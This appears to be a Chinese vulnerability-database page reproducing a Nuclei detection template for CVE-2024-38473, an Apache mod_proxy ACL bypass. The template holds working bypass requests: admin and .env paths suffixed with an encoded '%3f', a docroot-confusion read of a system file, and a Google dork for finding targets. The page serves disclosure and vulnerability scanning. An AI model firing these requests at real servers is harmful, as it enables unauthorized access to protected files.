CVE-2024-38473: Apache HTTP Server - ACL Bypass

日期: 2025-08-01 | 影响软件: Apache HTTP Server | POC: 已公开

漏洞描述

Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.

PoC代码[已公开]

id: CVE-2024-38473

info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  remediation: |
    Fixed in v2.4.60
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.87322
    epss-percentile: 0.99409
    cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
  metadata:
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm,vuln

flow: |
  http(1) && http(2)
  http(3)

http:
  # Path normalization ACL bypass
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"

    payloads:
      files:
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - admin.php
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - adminer.php
        - xmlrpc.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php

    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"

    matchers:
      - type: status
        status:
          - 200

  # docroot confusion
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"

    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# digest: 4a0a00473045022100aab46ab617c6637e428b973f0738b3d07006f60c406c375a670205b115e96ff502201fe04a6c598b7fc1402f9c92c8be27a1106b0a6fe30c0bdee764ca436527ee5a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-38473.yaml

相关漏洞推荐